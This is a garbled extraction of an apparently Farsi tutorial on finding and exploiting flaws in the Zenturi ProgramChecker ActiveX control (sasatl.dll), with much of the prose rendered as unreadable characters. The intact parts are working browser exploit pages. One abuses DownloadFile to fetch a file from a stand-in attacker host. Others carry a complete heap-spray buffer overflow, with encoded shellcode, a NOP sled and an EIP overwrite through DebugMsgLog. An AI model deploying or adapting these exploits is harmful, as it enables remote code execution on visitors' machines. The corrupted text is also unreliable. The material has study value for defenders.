� 3> ��>. 0�, PM2� � � � ��.

-. (�& �30 1� �2 , +* �� (�30 ��'�� )DownloadFile() /7-� . �7 �370 �7 �

/-� �0�; ^ D� 1 P�3?:

Function DownloadFile ( ByVal bstrSrc As String , ByVal bstrDest As String , ByVal lOptions As Long , ByVal lOptions2 As Long ) As Long

�,�2, 4�&�� 3u��F �30 6 � 9, �� 3;�. )� .i 3;�. ^7 D� (��7c P�3? � � �#0��

��&�,e ��s� ;<3!� =�& (� �?�� 30 �� 3� � � �� 4�>. 1� �7� S�� 3;�. ��

z% � �� (�& �� 6 ��0:& (� �0>� @3� �� 4�> }N� �. 6 P�7"8� �7 � ��:7 3� �7 �� (�

��0:& ��>. ��,:. �� 6 �� & �: 3� � �� P�cMa� 4]�< (� V�2 �z% � � G�� E 1� �

��0:&. v�� 8�¯� ��1 �� S�� 3a �:

Movl src,des

/-� / 389:�� [�A 1 P�3? � o� �30 �� /'� �� u� � �3 1. � ��30, � ��: <object id=expl classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" ></object> <input language=JavaScript onclick=exploit() type=button value="Launch Exploit"> <script> // this is part of ( Detecting and Exploiting ...) article by snake //Zenturi ProgramChecker ActiveX (sasatl.dll) Arbitrary File Download function exploit(){ var src = "http://attacker.ir/attacker.file"; var dest = "C:/attacker.file "; expl.DownloadFile(src,dest,0,0); } </script>

V�7A \0:7,- �� 37�3 (�#78 �' 1� �72 (�7� �7 �� (��'� � �,��30, �30 � � 1� 4��!0-� �

�,�� . [ �' ��30, S�� 3a �cmd.exe�� E � �� . �7 �72�. 7� �

��% �� A� (� lOptions�, �e 4�&�� (��;�� P�,8"c �,��30, .�,�� 0 �!

T0�� -� 1� G*/'� (�&�3� �,� 1 ¤> � (� � )* +,-. (�& �30 :

Sub DeleteItem ( ByVal bstrOrigFile As String , ByVal bstrDestFile As String )

��

�8,-� � ��30 �,�� * V�A \0:,- (�� 1� �� ?�� [ �' �,��30, . ( )* +,-. ��3�� =�&

[ �' o3"D �&system.ini /-� . �7 � 7� � )* +,-. �30 E ActiveX ��7� �7 (�370

NavigateUrl()/-� :

Sub NavigateUrl ( ByVal bstrUrl As String , ByVal bstrName As String , ByVal bstrWinProps As String )

�,�� V�A \0:,- (�� & [ �' 6 �,��30, �30 � � 1� 4��!0-� �. �30 � �30 � � +,��

DownloadFile() ��30 �, V�A \0:,- (�� 3� �� 3 (�& [ �' �� (��;�� 6

�,�� ! � � � � �� (�& �30 1� � � �2 ActiveX /-� 1 ¤> � (�30 :

Function SaveXmlFile ( ByVal lOptions As Long , ByVal bstrDest As String ) As String

�� + �� ?�� [ �' ��30, �30 � � 1� 4��!0-� �.�' ��30, S�� 3a � [ system.ini ��

�� . �� "#� ��% � 4�� + .

¦. E,�2�Heap Spray E,�2� � � ��°�� ; YT�� 9�1��. k7-3� �7 YT�� (� L�� Skylined (�7

/ 389:�� 7 �7&;�� 7� / 389:7�� 7 ��,�7� I%g � �& ;� (�& ( )* +,-. ��

z� !0-� � �3� 1� 4�Heap�> �0'; �� . ��7� / 389:�� . 1� $,* ��Heap �7& 7;� ��

�3 � .�� : �� 3>�. \0:7,- �� 37�3 (�7& ®'�7r ��1 �� (� �3�� \& L��

/-� +-�� ,: 1�� [ �c ) ��1 �� 3e (�DEP( 6 [7 �� P�37? �7 ��!-�0 � �

/-� �0�� (1�- ��0:. 6 ��2, �� L�� 1� 4��!0-� � �� #0 389:�� Copy-Past 1�

/ 389:��Skylined 47p E7,�2� �7 � 1� L�� 7 � �28"c 1� @Ma� �� ,� �� 0:&

3H, ��. � (]; �� 435 � ��, 1 � � �� y�� Po�% � P��0: ��3�� [,T� � �� L�� 7

/-�. ( �& /: 389:�� ,T��. 1� �� $ 3� P�,± \�2, �D- � �� HS ��7�� 4� . /-� �

\�� t �� W (� �� L�� 0N, . \& �� 3�3 P��0: . \,&�7! �7 @�7> 1� $,*

VTP � VT� 3�, ��>. .

��

¦,�.Virtual Table

VT & �30 � �Q f��. (��U C�� 6 fM� E (� ) /2~. � � ( /7-�. 7 �7� � �7��&E �370

1� �. f��. 6 �30 � � � �-0-� (� �3�, 4��3� �' O2~. k-3�VT G9- 6 4�> ª�N0-�

6 f��. � � 1� 4��!0-� � �3�, V�3��' ��. S��7� �7 � 7; 4��>� � ��, � � �� virtual

table pointer � � Vpointer� � 3;�. 7 1 (�7& S�7� � @3�3 � � 0�, �� (�

�, � ' ��3�. �� 0�; ^ D� � �� E �� 1 (�& fM�:

class B1 { public: void f0() {} virtual void f1() {} int int_in_b1; };

class B2 { public: virtual void f2() {} int int_in_b2; };

fM� G9-D ��K�6 o� (�& fM� 1� 4��!0-� �\,�2, )� 1 fM�: (

class D : public B1, public B2 { public: void d() {} void f2() {} // override B2::f2() int int_in_d; };

v��, �� 1 (�&�� & fM� � � 1� w'; 4p (� �3��:

B2 *b2 = new B2(); D *d = new D();

� t�� M �� 1�� (�H� � �� 7 S�7U6 /7-� �>�� 728"c �7 �7�'�U �7-VTP � VT �7*

v�, . /2~. ��0�b2:

b2: +0: pointer to virtual method table of B2 +4: value of int_in_b2 virtual method table of B2: +0: B2::f2() +4: B2::~B2()

��

'�U G9- /2~. ��d:

d: +0: pointer to virtual method table of D (for B1) +4: value of int_in_b1 +8: pointer to virtual method table of D (for B2) +16: value of int_in_b2 +20: value of int_in_d

virtual method table of D (for B1): +0: B1::f1() +4: D::~D() +8: D::d() +12: D::f2() virtual method table of D (for B2): +0: D::f2() // B2::f2() is overridden by D::f2() +4: D::~D()

¦,i. E,�2� ��0��-HS

L�� HS ��, $,* �� $ 3� �� =�& � �� ©,& 1� 4��!0-� � ;<3!� 6 . ��'�� , � � ��

�"� (�& 30 �� 3��6 �� ©7,& },z7 �7 � S70�� Proccess �1��79 �. .

�� . � �0'� ��z0�� ©,& ��30, �� 0:& �& ��'� �� 0-� � � 1� �2 �& ;�� 0N�>3�

�� S0��.

6 �> �0!; �� 3u��F E,�2� ��HS �37� � �7& ��71 1� 4��!07-� � ;<3!� JavaScript �7 �

VBScript �1��9, V�A ©,& S0�� ) 1� �T�% � � ��JavaScript \, 37H, 4p .( �7 � ��

(�� 1 ��% (��U �� 0>� ;<3!� L��NOP �28> � 6 /-� �,T3� 4�� /�:� � ��. E � �

�&�, . , 4]7�< ©,& 1� �38 E �� & �0>� � � 1� E & �� , � � �� 7�2. � �7& �07>�

©,& 1� (�� 1 \HU �� >� ²�� y�� 41�� ;<3!� 4�> �,T3� ) /-� �2m �� s. �� ( ��

�� S�¥>�. ( )* +,-. 1� 4��!0-� � 6 ©,& },z 1� G*0�� :7 3� 1�7 �7 7Tvirtual

table pointer f��. � NOP + Shellcode v1��9, ©,& �� .� � 1� G* �� VTP �7

(�& �0>�NOP + Shellcode V�37� �7' �� E7~. E ;�� & � ��2, 4��>� �

�7 �78,T� & � � � ��VT �� 7�� 7 �� ©7,& �� 7 4�7> I7 �� (�&�7� 6 �7� �7-0-�

�� ¨, . 1� �& �30 V�3� �' (� �� &��VT �7 8 �9 �� k-3� 6 ��3�, 4��!0-� �'�7�� 7 ��

�7& ( )7* +,7-. ��7� / 389:7�� (�7 E7,�2� � � 1� ��30, OU�� 1� � ��, (

�3;��3;�� 4��!0-� .��>��, 1 P�3? � 6 8 �9 �� k-3� 4�> �,T3� (�& ��:

��

mov ecx, dword ptr [eax] ; f��.��2, (��;�� S��

push eax ; S�-��; 4��>�S�� 3;�. YT�� 3�c �

call dword ptr [ecx+08h] ; /:'. 1� �� V�3��'{S��

� �� /2~. & �,T�� / � c++ � ; 4��>� E 6 VT ��2, (��#�� 3� �� . / 389:7�� (�7

v�� Y�� /2~. E f ��. E � 1�,�6 /2~. E ; 4��>� ��. /72~. � � �� 7; 4��7>�

VT �� 6 �� &�3� 4��>� � �� 3 (�&�� VT �8?� !/-� 1 P�3? � L�� 8� (�e:

4�� ³

�7 4�7> / 389:�� [,T� YF � 6 ��- �� ; �"� � �> 4�> 4�� P��,�3�

Y�,* L�� )RET Overwrite( L�� Heap Spray 389:�� P��,7�3� � 4�7� /

��, �� 1o.

¦,�. L�� ,0 389:��Heap Spray

+,-. 1� 4��!0-� � �� 0� ��* ; 4��>� �� S0�� 3� T0�� ( )VT jv��

/":A �� 3u��F* �� : 3�1� � � 6 � �� 4�&�� Y�, ; 4��>� � � ) 0´? P�3? �

eax � ecx ( 6 7; 4��>� �: 3�1� 1� G* �� 6 \,�� S0�� ,� �� (�� 6 \,��30,

�� .ecx 1� 4��!07-� �7 G97- 6 4�> (��;�� ecx V�37��' �7a3 ��7� 6 ��7� /:7'. �

�3�, . �: 3�1� L�� 8?� =�& � � ��eax � � ecx/-� .�� 4��!0-� �

� � T0�� 1�� ]� � /-� )* ��2 � ��: <object id=expl classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5"></object> <input language=JavaScript onclick=exploit() type=button value="Launch Exploit"> <script> // this is part of ( Detecting and Exploiting ...) article by snake // I use this codes to find out , what happen in memory when IE crash! // attach browser ( IE) to debugger and then run the code! function exploit(){ var buff_size = 1000; var x = unescape("%41"); var buff = x; while (buff.length < buff_size) buff += x; expl.DebugMsgLog(buff); } </script>

��

��]e $,* 4�> R, $,* P�3? � ��0-�� !-�0 ! �� S0�� 3� � Eax v�� . � � �

��7� S70�� 3� 13�&EIP v�� ! ��7� S70�� 7� �7�eax G97- � ecx ]7� S70��

\,%0: eip �3 ! \,%0: S0�� S�Ueip v1��9, . � \0:,- �� > ��30 �-� 1� G*

) XP SP2 ( f��.EIP f��. 1� ;� S�� 3a � 6 ��, X�� 0x7c903e7c ��37�c �

jmp 6 \�,� 4��!0-� IE � [ �� f��. 0x7c3f3e7c 1� �zN� �� 2 � �H,0� �� 2,

�� '�U ��", 1� �� 1� / 389:�� > \,&�3� 4�� @�. �7� /-� � � µ�%�� [,T� j ��

1� / � & ��% E � � /�;1� f��.ASCII�>� .�� / � & ��7r � /�;1� f��.� �7

0x00 � 0x7f �3�, . � P�zN� � � � [ �� f��. E �� ,*% /7-� �72m ]� �� ! �37��

L��HS/-� . �� E (� (��2, �`�� I'3 �,0 389:!

�3770 1� 4��!077-�HS 4�377r �� #77�� User Adress Space 1� R77D 0x00000000 �77�

0x7fffffff )* ��2 � /-� . (�& f��. ��, � � �� /:,� �82� ASCII �37�3 (��,:

/-�!��3�, (�� 0-� 1 P�3? � � �� [U� :

• ��4�> 4��!0-� f��. � ��3� � ©,& (�& �38 ��D� w'�

• (��U ©,& 1� �",�c (�#�38 },z NOP + Shellcode

• �: 3� 1� � '� � �-EIP©,& �� 28> f��. �

��0:7& ��' 6 /:� 4¬ ��. 1� ��, 1 � � �� 30, �� & f��.. 1� �7,��30, S�7� �37a �7

(�#7-��.0x0c0c0c0c 6 0x0d0d0d0d6 0x050505056 0x0a0a0a0a 7& �7 �

©,& �&� f��. 4��r �� 2-� f��. ) �7 �7W k7-3� �7�NOP+Shellcode 6 Spray

/-� �0�; ( 6 �>� �,�� 4��!0-�. �7� ©,& (�& �38 ��D� � �& f��. � � 1� E & 1� 4��!0-� �0�T�

�W k-3�Spray /-� �0:�� 6 /-� �0�; . � ;� S�� 3a �Spray �� £ �7 ©7,& �378

r� �&� f��. 4�� 0x05xxxxxx f��. 1� �,��30,e 6 �,-] 0x0cxxxxxx 6 �7,�� 4��!07-�

�� 4��>� �38D �� V�2 � � � �0'�,� },z 13�& � f��. � � �� . �378 6 �2� � � � �02�

�� >� ²�� (��A � � � ©,& (�& ��7- �7 �&� f��. 4��r �. w7>3� ��7 1 �37�� +7�

/-� 4�,-� � ' / 389:��!

¦,�./ 389:�� w>3�

��% 6 ��2, �3u� � �&< � �� (�,� YT��# ��28> [,�A 1� 6Nop6 CLSID � ../-�. � �

v��, �� % : <object id=expl classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" ></object> <input language=JavaScript onclick=exploit() type=button value="Launch Exploit"> <script>

�h

// this is part of ( Detecting and Exploiting ...) article by snake // Zenturi ProgramChecker ActiveX (sasatl.dll) Remote Buffer Overflow ( Heap Spray Technique)

var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); var spraySlide = unescape("%u9090%u9090");

\,�� }N� �� ©,& 1� � �& �38 ��D� � � �� 1� G*. �7& �38 � � ��D� 6 �> �0!; �� 3u��F

(� 4��!0-� ��3 f��. �Spray�� B�� \,%0: . (�#�38 ��D� w'� �� (�& 4�� 1� �2

/-� ©,& (�& f��. �-� � �� w>3� ©,&: <object id=expl classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" ></object> <input language=JavaScript onclick=exploit() type=button value="Launch Exploit"> <script> //this is part of ( Detecting and Exploiting ...) article by snake //I wrote this code for allocating Heap blocks! //after allocating big heap blocks , the code call DebugMsgLog() method! //this cause IE crash , and then you can browse the Heap gracefully :D function exploit(){ var ooo = 'O'; var shellcodeSize = 300; var FakeShellcode = ooo; var HeapBlockSize = 0x400000; var spraySlideSize = HeapBlockSize - shellcodeSize; var spraySlide = unescape("%u9090%u9090"); var Heap = new Array(); while (FakeShellcode.length<shellcodeSize) FakeShellcode += ooo; while (spraySlide.length*2<spraySlideSize) spraySlide += spraySlide; spraySlide = spraySlide.substring(0,spraySlideSize/2); for (i=0;i< 20;i++){ Heap[i] = spraySlide + FakeShellcode; } expl.DebugMsgLog(FakeShellcode+FakeShellcode+FakeShellcode+FakeShellcode); } </script>

(�&�� ' $,* ��% oi£� � �� 4�� A o� (�&�� /:,�D � � � i£ �38

41�� ©,& 1�0x400000 1� �� / � Nop [2�0 �28> E 4�Mc � =�U C�3� 1� O!!! 7*

�1�:, . �30 �#0�� DebugMsgLog() �� V�3�' �� . (�7& ��7 3;�. �7 �30 � � V�3��'

«c� �� 3�3 Crash �� IE },z 1� G* 6 �7,��30, /U�� S�,� � �W � �3�, ©,&

� �; �3� �� 3 f��. S�� ©,& ��. f��. S�7�� 7 �7 o�7 (�7& �� (�� 1� G*

��

0x05050505 � f��. � � �� 4�&�� ©,& NOP �7� �� 4�7> �07>�� (�&

��2, 4��>�. f��. S�� 1� G*0x0a0a0a0a \0�; �#7�� \0'�7,� �� 1� (��

��> ��3 ;�� =a 1� �u� E �. 4�� £ o�7 (�&�7� (�7�� 1� G7* �� ©,& 6 �,��30,

�,�� 4�&�� .

4�� £

(��7� o�7 L�� 1� 4��!07-� �7 6 �7 �� 3 f��. (� 1�,� ��3 ©,& (�& �38 ��D� w'�

/-� S3%D ��. �� W �7 3* P�37? �7 �� ©,& (�#�38 ��D� 6 �� 2� E ��'� � �,��30, OU

�,�� ?�r: var heapBlockSize = 0x400000; var heapSprayToAddress = 0x0a0a0a0a; var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;

& (�777#�38 ��777D� �777,��30, �777U�� 777 �3777��777,�� 777-�r �� ©777,. f��. ],777¥� �777

heapSprayToAddress �7 (1�7,� � � � ��, $&�� $ ��'� �,� ©,& (�#�38 ��D� 6

/:,� �u� � �3 1. � ��. ��-�r ! ��% � � S�UNop Sile O7U�� 7 �7� \,7�� -�r �� &

\,�, ��: var SizeOfHeapDataMoreover = 0x24; var payLoadSize = (shellcode.length * 2); var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);

��

��77% SizeOfHeapDataMoreover 41��77�� 377�c �77 o377"D Header��77-�r �'�77��

�3�, . ��K� � �� 1� G*Nop Slide E7 1� �7 � (�7 6 v1��9, �& E7"� E7�3� ��7�

v]�, : function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide.length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return (spraySlide); } spraySlide = getSpraySlide(spraySlide,spraySlideSize);

89:�� (�&�� /":A � � ��,U � �3��3 ©,& (�& �38 },z 6v3�, E �� / ! E7 ��K� �

� �. (�& �� * � � ��.Nop + Shellcode 38 6 � 1� �� ©,& (�&Payload � �-

\,�2, ! var HeapMemory = new Array(); for (i=0;i<heapBlocks;i++) { HeapMemory[i] = spraySlide + shellcode; }

v��¨, �� / 39:�� E w>3� � �,� �. ��: function exploit() { var size_buff = 4000; var x = unescape("%0a%0a%0a%0a"); while (x.length<size_buff) x += x; expl.DebugMsgLog(x); }

(��% ��3�c �� size_buff (1�,� RD 6 /:,� (��3� V�� /,F� 1� 6 v]�, ��

�� : 3�1� (� ��% I,A� ��-�r �EIP v�� . ��% � �� {�{ �: 3�1� 1� $,*

EIP � 4�� * �� '�� (�D / � EIP � � �� ,�,�, � � 6 ��2, �: 3�1� �� 7 / 389:��

�� '� 41��£££\0'; �� / � ! ��exploit() f��. � �� '� 0a0a0a0a ��2, *

6 /-� 4�> �0��- / � E C�3� 1� f��. � � �3� � (�� 7 /7-�� P�37? � ��3�c d,& �

EIP/-� C�3� 6 C�3� �� 6 �]�,e ��A !�� [ �� P�3? � �� / 389:�� ,�� 4�&�� : <object id=expl classid="clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5" ></object> <input language=JavaScript onclick=exploit() type=button value="Launch Exploit"> <script> // this is part of ( Detecting and Exploiting ...) article by snake // Zenturi ProgramChecker ActiveX (sasatl.dll) Remote Buffer Overflow ( Heap Spray Technique)

��

var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + "%u652E%u6578%u9000"); var spraySlide = unescape("%u9090%u9090"); var heapBlockSize = 0x400000; var heapSprayToAddress = 0x0a0a0a0a; var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize; var SizeOfHeapDataMoreover = 0x24; var payLoadSize = (shellcode.length * 2); var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover); function getSpraySlide(spraySlide, spraySlideSize){ while (spraySlide.length*2<spraySlideSize){ spraySlide += spraySlide; } spraySlide = spraySlide.substring(0,spraySlideSize/2); return (spraySlide); } spraySlide = getSpraySlide(spraySlide,spraySlideSize); var HeapMemory = new Array(); for (i=0;i<heapBlocks;i++){ HeapMemory[i] = spraySlide + shellcode; } function exploit(){ var size_buff = 4000; var x = unescape("%0a%0a%0a%0a"); while (x.length<size_buff) x += x; expl.DebugMsgLog(x); } </script>

4�� \0:,- (�� . (�� H,0� �:

4��

��

¶.-�9-(��)� 6 �778c 6 V�,077>. ]77 � 6 �77�]8c 6 ·377� ��077-�� 1� �#770�� ScorpionO 6 Scorpion 6

black.Scorpion ��%,%g 4�; �� c � � � ¸ O,� �Snoop �7 6 \2�7, (��-�9- 6

� ��,F �� O�r � O-�� a��:�� /.

�,�� ¸ # ( M� �� #>��{¦

Refrences: [1] HP Compaq Notebooks ActiveX Remote Code Execution Exploit. http://www.milw0rm.com/exploits/4720 [2] AxMan ActiveX Fuzzer. http://www.metasploit.com/users/hdm/tools/axman/ [3] Detecting Web Browser Heap Corruption. http://securitylabs.websense.com/content/Assets/BH2007-DetectingWebBrowserHeapCorruptionnAttacks.pdf [4] Heap spraying. http://en.wikipedia.org/wiki/Heap_spraying [5] Heap Feng Shui in JavaScript. http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf [6] Globally Unique Identifier. http://en.wikipedia.org/wiki/Globally_Unique_Identifier [7] About IObject Safety Extensions for Internet Explorer. http://msdn.microsoft.com/en-us/library/aa768181(VS.85).aspx [8] CLSID Key. http://msdn.microsoft.com/en-us/library/ms691424(VS.85).aspx [9] ProgID. http://en.wikipedia.org/wiki/ProgID [10] Safe Initialization and Scripting for ActiveX Controls. http://msdn.microsoft.com/en-us/library/aa751977(VS.85).aspx [11] Introduction to ActiveX Controls. http://msdn.microsoft.com/en-us/library/aa751972.aspx [12] internet exploiter. Www.edup.tudelft.nl/~bjwever/exploits/InternetExploiter.zip [13] Windows Memory Layout. http://www.openrce.org/reference_library/files/reference/Windows%20Memory%20Layout,%20User-Kernel%20Address%20Spaces.pdf [14] kill-bit faq . http://blogs.technet.com/swi/archive/2008/02/06/The-Kill_2D00_Bit-FAQ_3A00_-Part-1-of-3.aspx [15] dispatch table. http://en.wikipedia.org/wiki/Virtual_method_table

Tools: [1] beta encoder. http://skypher.com/SkyLined/download/www.edup.tudelft.nl/~bjwever/src/beta.c [2] COMRaider . http://labs.idefense.com/software/fuzzing.php#more_comraider [3] AxMan . http://www.metasploit.com/users/hdm/tools/axman/

��

[4] Ole viewer . http://www.microsoft.com/downloads/details.aspx?familyid=5233b70d-d9b2-4cb5-aeb6-45664be858b6 [5] TLB viewer . http://www.jose.it-berater.org/ [6] ActiveX Manager . http://www.4developers.com/xmgr/ [7] ActiveXplorer . http://www.aivosto.com/activexplorer.html [8] Combust . http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-bretmounet-combust.zip [9] Heapvis . https://www.openrce.org/downloads/details/1/Heap_Vis

detecting and exploiting vulnerability in activex controlsfarsi]-detecting-and-exploiting... ·...

Documents